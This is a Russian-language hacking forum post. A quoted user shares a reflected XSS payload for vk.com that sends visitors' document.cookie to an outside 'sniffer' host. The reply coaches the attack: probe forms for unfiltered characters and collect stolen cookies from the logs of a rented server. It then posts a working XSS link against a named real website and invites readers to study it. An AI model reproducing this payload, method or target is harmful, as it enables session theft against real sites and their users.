[quote=MashaRomanova;365742]
Пытаюсь сделать пассивную xss :
Пишу что - то вроде vk.com/hackMe/it_is_our_xss.php?yourXSS=
img = new Image(); img.src = "http://kartinkaSniffer.ru/kggg.gif?"+document.cookie;

Чувак) не хера так не получится у тя)) сделать) тебе для начало надо найти xss) а для этого ищи все формы) на фильтрацию спец символов, "" После того как найдешь) пиши скрипт, лучше не юзай сервисы) возьми себе vds сервер, натяни туда isp и просто смотри логи) Сейчас я найду тебе xss на каком нить сайте)

-------

Вот нашел xss на каком то Исламском сайте) я ищу всегда xss вручную, пишу по формам 12345> и смотрю пропустила форма символ > или нет) если да, то начинаю творить скрипт)
Вот кста уязвимость

http://isxak.ru/?s=%3C%2Ftitle%3E%3C...t=%D0%BE%D0%BA

Посмотрите внимательно) изучите все) и тд и тп..... Буду вопросы пишите сюда)